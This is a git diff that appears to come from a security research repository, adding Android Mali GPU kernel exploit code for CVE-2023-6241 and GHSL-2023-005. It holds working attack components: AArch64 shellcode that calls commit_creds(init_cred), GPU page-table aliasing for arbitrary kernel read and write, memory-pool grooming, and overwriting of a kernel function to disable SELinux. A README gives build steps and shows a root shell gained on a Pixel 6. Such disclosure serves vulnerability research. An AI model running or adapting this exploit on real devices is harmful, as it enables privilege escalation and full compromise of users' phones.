kbase_ioctl_kinstr_prfcnt_setup) + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/** + * struct kbase_ioctl_buffer_liveness_update - Update the live ranges of buffers from previous frame + * + * @live_ranges_address: Array of live ranges + * @live_ranges_count: Number of elements in the live ranges buffer + * @buffer_va_address: Array of buffer base virtual addresses + * @buffer_sizes_address: Array of buffer sizes + * @buffer_count: Number of buffers + * @padding: Unused + */ +struct kbase_ioctl_buffer_liveness_update { + __u64 live_ranges_address; + __u64 live_ranges_count; + __u64 buffer_va_address; + __u64 buffer_sizes_address; + __u64 buffer_count; +}; + +#define KBASE_IOCTL_BUFFER_LIVENESS_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 67, struct kbase_ioctl_buffer_liveness_update) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... 
+ * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define 
KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+#ifdef __cplusplus
+}
+#endif
+
+#endif /* _UAPI_KBASE_IOCTL_H_ */
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c
new file mode 100644
index 0000000..1774f0e
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.c
@@ -0,0 +1,265 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <err.h>
+#include "stdbool.h"
+
+#include "mem_read_write.h"
+#include "mempool_utils.h"
+#include "firmware_offsets.h"
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+  int prot = PROT_READ;
+  if (!read_only) {
+    alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+    prot |= PROT_WRITE;
+  }
+  alloc.in.va_pages = va_pages;
+  alloc.in.commit_pages = commit_pages;
+  mem_alloc(mali_fd, &alloc);
+  void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+  if (region == MAP_FAILED) {
+    err(1, "mmap failed");
+  }
+  return region;
+}
+
+static inline uint32_t lo32(uint64_t x) {
+  return x & 0xffffffff;
+}
+
+static inline uint32_t hi32(uint64_t x) {
+  return x >> 32;
+}
+
+/* Encode an AArch64 ADRP instruction that loads the page address of `label`
+ * into register `rd`, relative to the page of `pc`. */
+static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+  uint64_t pc_page = pc >> 12;
+  uint64_t label_page = label >> 12;
+  int64_t offset = (label_page - pc_page) << 12;
+  int64_t immhi_mask = 0xffffe0;
+  int64_t immhi = offset >> 14;
+  int32_t immlo = (offset >> 12) & 0x3;
+  uint32_t adpr = rd & 0x1f;
+  adpr |= (1 << 28);
+  adpr |= (1 << 31); //op
+  adpr |= immlo << 29;
+  adpr |= (immhi_mask & (immhi << 5));
+  return adpr;
+}
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) {
+
+  uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+  //Sets x0 to init_cred
+  root_code[ADRP_INIT_INDEX] = init_adpr;
+  root_code[ADD_INIT_INDEX] = add_init;
+  //Sets x8 to commit_creds
+  root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+  root_code[ADD_COMMIT_INDEX] = add_commit;
+  root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+  root_code[5] = 0xd63f0100; // blr x8
+  root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+  root_code[7] = 0xd65f03c0; // ret
+}
+
+/* Rewrite `addr` so that it resolves through level-3 page-table entry
+ * 0x100 (== OVERWRITE_INDEX) of the same level-2 table. */
+static uint64_t set_addr_lv3(uint64_t addr) {
+  uint64_t pfn = addr >> PAGE_SHIFT;
+  pfn &= ~ 0x1FFUL;
+  pfn |= 0x100UL;
+  return pfn << PAGE_SHIFT;
+}
+
+/* Index of `addr` in its page table at `level` (9 bits per level, 4KB pages). */
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+  uint64_t vpfn = addr >> PAGE_SHIFT;
+  vpfn >>= (3 - level) * 9;
+  return vpfn & 0x1FF;
+}
+
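+/*
+ * Worked example of the page-table arithmetic above (assuming the 4KB-page,
+ * 9-bits-per-level AArch64 format implied by PAGE_SHIFT and the 0x1FF masks):
+ *
+ *   addr = 0x7000201000
+ *   vpfn = addr >> PAGE_SHIFT = 0x7000201
+ *   compute_pt_index(addr, 3) = vpfn & 0x1FF         = 1
+ *   compute_pt_index(addr, 2) = (vpfn >> 9) & 0x1FF  = 1
+ *   compute_pt_index(addr, 1) = (vpfn >> 18) & 0x1FF = 0x1C0
+ *
+ * set_addr_lv3(0x7000201000) clears the level-3 index and substitutes 0x100
+ * (== OVERWRITE_INDEX), giving 0x7000300000: the page reached through
+ * level-3 entry 256 of the same level-2 table.
+ */
+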
+struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64) {
+  int ret = 0;
+
+  const char* source_str64 =
+    "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {"
+    "size_t idx = get_global_id(0);"
+    "if (flag[idx]) {"
+    "  __global unsigned long *addr = (__global unsigned long*)(va[idx]);"
+    "  addr[0] = in_out[idx];"
+    "} else {"
+    "  __global unsigned long *addr = (__global unsigned long *)(va[idx]);"
+    "  in_out[idx] = addr[0];"
+    "}"
+    "};";
+
+  const char* source_str32 =
+    "__kernel void rw_mem(__global unsigned long *va, __global unsigned long *in_out, __global unsigned long *flag) {"
+    "size_t idx = get_global_id(0);"
+    "if (flag[idx]) {"
+    "  __global unsigned int *addr = (__global unsigned int*)(va[idx]);"
+    "  addr[0] = (unsigned int)(in_out[idx]);"
+    "} else {"
+    "  __global unsigned int *addr = (__global unsigned int *)(va[idx]);"
+    "  in_out[idx] = addr[0];"
+    "}"
+    "};";
+
+  const char* source_str = is64 ? source_str64 : source_str32;
+
+  size_t source_size = strlen(source_str);
+
+  cl_mem va = clCreateBuffer(context, CL_MEM_READ_WRITE,
+          sizeof(uint64_t), NULL, &ret);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to create va buffer\n");
+  }
+  cl_mem in_out = clCreateBuffer(context, CL_MEM_READ_WRITE,
+          sizeof(uint64_t), NULL, &ret);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to create in_out buffer\n");
+  }
+  cl_mem flag = clCreateBuffer(context, CL_MEM_READ_WRITE,
+          sizeof(uint64_t), NULL, &ret);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to create flag buffer\n");
+  }
+
+  cl_program program = clCreateProgramWithSource(context, 1, (const char**)(&source_str), (const size_t*)(&source_size), &ret);
+  ret = clBuildProgram(program, 1, device_id, NULL, NULL, NULL);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to build program\n");
+  }
+
+  cl_kernel kernel = clCreateKernel(program, "rw_mem", &ret);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to create kernel %d\n", ret);
+  }
+  printf("kernel success\n");
+  ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&va);
+  ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&in_out);
+  ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&flag);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to set kernel arg\n");
+  }
+  struct rw_mem_kernel out = {0};
+  out.va = va;
+  out.in_out = in_out;
+  out.flag = flag;
+  out.kernel = kernel;
+  out.program = program;
+  return out;
+}
+
+void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel) {
+  uint64_t write = 1;
+  int ret = 0;
+  ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL);
+  ret = clEnqueueWriteBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), value, 0, NULL, NULL);
+  ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL);
+
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to write to buffer\n");
+  }
+
+  size_t global_work_size = 1;
+  size_t local_work_size = 1;
+  ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to enqueue kernel\n");
+  }
+  if (clFlush(command_queue) != CL_SUCCESS) {
+    err(1, "Failed to flush queue in write_to\n");
+  }
+  usleep(10000);
+}
+
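+/*
+ * Usage sketch (hypothetical names: `ctx`, `dev` and `queue` stand for an
+ * OpenCL context, device id and command queue set up by the caller). Once a
+ * GPU virtual address aliases a kernel page, each call moves one value
+ * through the rw_mem kernel built by create_rw_mem():
+ *
+ *   struct rw_mem_kernel k = create_rw_mem(ctx, &dev, true);
+ *   uint64_t addr = ...;  // GPU VA that aliases the target kernel page
+ *   uint64_t value = read_from(mali_fd, &addr, queue, &k);
+ *   write_to(mali_fd, &addr, &value, queue, &k);
+ *   releaseKernel(&k);
+ *
+ * write_func() below instead takes a 32-bit variant (is64 == false), so that
+ * each store writes a single 4-byte instruction.
+ */
+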
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32) {
+  uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+  uint64_t curr_overwrite_addr = 0;
+  for (int i = 0; i < size; i++) {
+    uint64_t base = reserved[i];
+    uint64_t end = reserved[i] + reserved_size * 0x1000;
+    uint64_t start_idx = compute_pt_index(base, 3);
+    uint64_t end_idx = compute_pt_index(end, 3);
+    for (uint64_t addr = base; addr < end; addr += 0x1000) {
+      uint64_t overwrite_addr = set_addr_lv3(addr);
+      if (curr_overwrite_addr != overwrite_addr) {
+        LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+        curr_overwrite_addr = overwrite_addr;
+        for (int code = code_size - 1; code >= 0; code--) {
+          uint64_t this_addr = overwrite_addr + func_offset + code * 4;
+          uint64_t this_code = shellcode[code];
+          write_to(mali_fd, &this_addr, &this_code, command_queue, kernel32);
+        }
+        usleep(300000);
+      }
+    }
+  }
+}
+
+uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel) {
+  uint64_t read = 0;
+  int ret = 0;
+  ret = clEnqueueWriteBuffer(command_queue, kernel->va, CL_TRUE, 0, sizeof(uint64_t), gpu_addr, 0, NULL, NULL);
+  ret = clEnqueueWriteBuffer(command_queue, kernel->flag, CL_TRUE, 0, sizeof(uint64_t), &read, 0, NULL, NULL);
+
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to write to buffer\n");
+  }
+
+  size_t global_work_size = 1;
+  size_t local_work_size = 1;
+  ret = clEnqueueNDRangeKernel(command_queue, kernel->kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL);
+  if (ret != CL_SUCCESS) {
+    err(1, "Failed to enqueue kernel\n");
+  }
+  uint64_t out = 0;
+  if (clEnqueueReadBuffer(command_queue, kernel->in_out, CL_TRUE, 0, sizeof(uint64_t), &out, 0, NULL, NULL) != CL_SUCCESS) {
+    err(1, "Failed to read result\n");
+  }
+  if (clFlush(command_queue) != CL_SUCCESS) {
+    err(1, "Failed to flush queue in read_from\n");
+  }
+  usleep(10000);
+  return out;
+}
+
+void releaseKernel(struct rw_mem_kernel* kernel) {
+  clReleaseKernel(kernel->kernel);
+  clReleaseProgram(kernel->program);
+  clReleaseMemObject(kernel->va);
+  clReleaseMemObject(kernel->in_out);
+  clReleaseMemObject(kernel->flag);
+  memset(kernel, 0, sizeof(struct rw_mem_kernel));
+}
+
+/* Reset the hijacked PGD entry at OVERWRITE_INDEX to an invalid descriptor
+ * (bit 0 of the value 2 is clear) so the alias cannot be used afterwards. */
+void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel) {
+  uint64_t addr = pgd + OVERWRITE_INDEX * sizeof(uint64_t);
+  uint64_t invalid = 2;
+  write_to(mali_fd, &addr, &invalid, command_queue, kernel);
+}
+
+/* Read back /sys/fs/selinux/enforce; the return value is the ASCII code of
+ * the flag, so 48 ('0') indicates that SELinux is permissive. */
+int run_enforce() {
+  char result = '2';
+  sleep(3);
+  int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+  read(enforce_fd, &result, 1);
+  close(enforce_fd);
+  LOG("result %d\n", result);
+  return result;
+}
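+
+/*
+ * Sketch of how the pieces above fit together (the capitalized symbols are
+ * stand-ins for the constants expected from firmware_offsets.h; the real
+ * call sites live in the main exploit file):
+ *
+ *   uint32_t root_code[8] = {0};
+ *   fixup_root_shell(INIT_CRED, COMMIT_CREDS, SEL_READ_ENFORCE,
+ *                    ADD_INIT, ADD_COMMIT, root_code);
+ *   write_func(mali_fd, SEL_READ_ENFORCE, reserved, nents, root_code,
+ *              sizeof(root_code) / sizeof(root_code[0]), RESERVED_SIZE,
+ *              queue, &kernel32);
+ *   run_enforce();  // reads back /sys/fs/selinux/enforce
+ */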
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h
new file mode 100644
index 0000000..1906051
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mem_read_write.h
@@ -0,0 +1,41 @@
+#ifndef MEM_READ_WRITE_H
+#define MEM_READ_WRITE_H
+
+#include "CL/cl.h"
+#include "mali_kbase_ioctl.h"
+#include "mali_base_csf_kernel.h"
+#include "mali_base_kernel.h"
+
+#define KERNEL_BASE 0x80000000
+
+#define PAGE_SHIFT 12
+
+#define OVERWRITE_INDEX 256
+
+struct rw_mem_kernel {
+  cl_mem va;
+  cl_mem in_out;
+  cl_mem flag;
+  cl_kernel kernel;
+  cl_program program;
+};
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group);
+
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code);
+
+void write_to(int mali_fd, uint64_t* gpu_addr, uint64_t* value, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
+
+uint64_t read_from(int mali_fd, uint64_t* gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
+
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, cl_command_queue command_queue, struct rw_mem_kernel* kernel32);
+
+void cleanup(int mali_fd, uint64_t pgd, cl_command_queue command_queue, struct rw_mem_kernel* kernel);
+
+struct rw_mem_kernel create_rw_mem(cl_context context, cl_device_id* device_id, bool is64);
+
+void releaseKernel(struct rw_mem_kernel* kernel);
+
+int run_enforce();
+
+#endif
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c
new file mode 100644
index 0000000..c96b25c
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.c
@@ -0,0 +1,60 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <err.h>
+#include "stdbool.h"
+#include <stdint.h>
+
+#include "mempool_utils.h"
+
+#define POOL_SIZE 16384
+
+/* Thin wrapper around KBASE_IOCTL_MEM_ALLOC. */
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+    err(1, "mem_alloc failed\n");
+  }
+}
+
+/* Allocate `nents` fully committed GPU regions of `pages` pages each and
+ * record their GPU VAs in `reserved_va`. */
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+  for (int i = 0; i < nents; i++) {
+    union kbase_ioctl_mem_alloc alloc = {0};
+    alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+    int prot = PROT_READ | PROT_WRITE;
+    alloc.in.va_pages = pages;
+    alloc.in.commit_pages = pages;
+    mem_alloc(mali_fd, &alloc);
+    reserved_va[i] = alloc.out.gpu_va;
+  }
+}
+
+/* mmap each reserved region; note that the entry in `reserved_va` is
+ * replaced by the CPU address of the mapping. */
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+  for (int i = 0; i < nents; i++) {
+    void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+    if (reserved == MAP_FAILED) {
+      err(1, "mmap reserved failed %d\n", i);
+    }
+    reserved_va[i] = (uint64_t)reserved;
+  }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+  int prot = PROT_READ | PROT_WRITE;
+  alloc.in.va_pages = POOL_SIZE;
+  alloc.in.commit_pages = POOL_SIZE;
+  mem_alloc(mali_fd, &alloc);
+  return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+  struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+  if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+    err(1, "free_mem failed\n");
+  }
+}
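+
+/*
+ * Sketch of the intended use (inferred from the two functions above):
+ * drain_mem_pool() allocates POOL_SIZE committed pages, emptying the
+ * per-context memory pool, and release_mem_pool() then frees them so the
+ * pool refills with pages whose reuse the exploit can predict:
+ *
+ *   uint64_t drain = drain_mem_pool(mali_fd);  // empty the pool
+ *   release_mem_pool(mali_fd, drain);          // refill it with known pages
+ */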
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h
new file mode 100644
index 0000000..9aa4caa
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mempool_utils.h
@@ -0,0 +1,20 @@
+#ifndef MEMPOOL_UTILS_H
+#define MEMPOOL_UTILS_H
+
+#include <stdint.h>
+#include "mali_kbase_ioctl.h"
+#include "mali_base_csf_kernel.h"
+#include "mali_base_kernel.h"
+#include "log_utils.h"
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc);
+
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va);
+
+uint64_t drain_mem_pool(int mali_fd);
+
+void release_mem_pool(int mali_fd, uint64_t drain);
+
+#endif
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
new file mode 100644
index 0000000..44409ad
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
@@ -0,0 +1,39 @@
+## Exploit for GHSL-2023-005
+
+The write-up can be found [here](https://github.blog/2023-04-06-pwning-pixel-6-with-a-leftover-patch). A security patch from the upstream Arm Mali driver was somehow missed in the updates for the Pixel phones, and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit was tested on the Google Pixel 6 running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_jit.c -o mali_jit
+```
+
+The exploit should be run a couple of minutes after boot and should be fairly reliable. If it fails, it can be rerun and should succeed within a few attempts.
+When successful, it disables SELinux and gains root:
+
+```
+oriole:/ $ /data/local/tmp/mali_jit
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+region freed
+found region 16115 at 7000200000
+overwrite addr : 7ae9700710 710
+overwrite addr : 7ae9500710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7ae9700fd4 fd4
+overwrite addr : 7ae9500fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include <asm/ioctl.h>
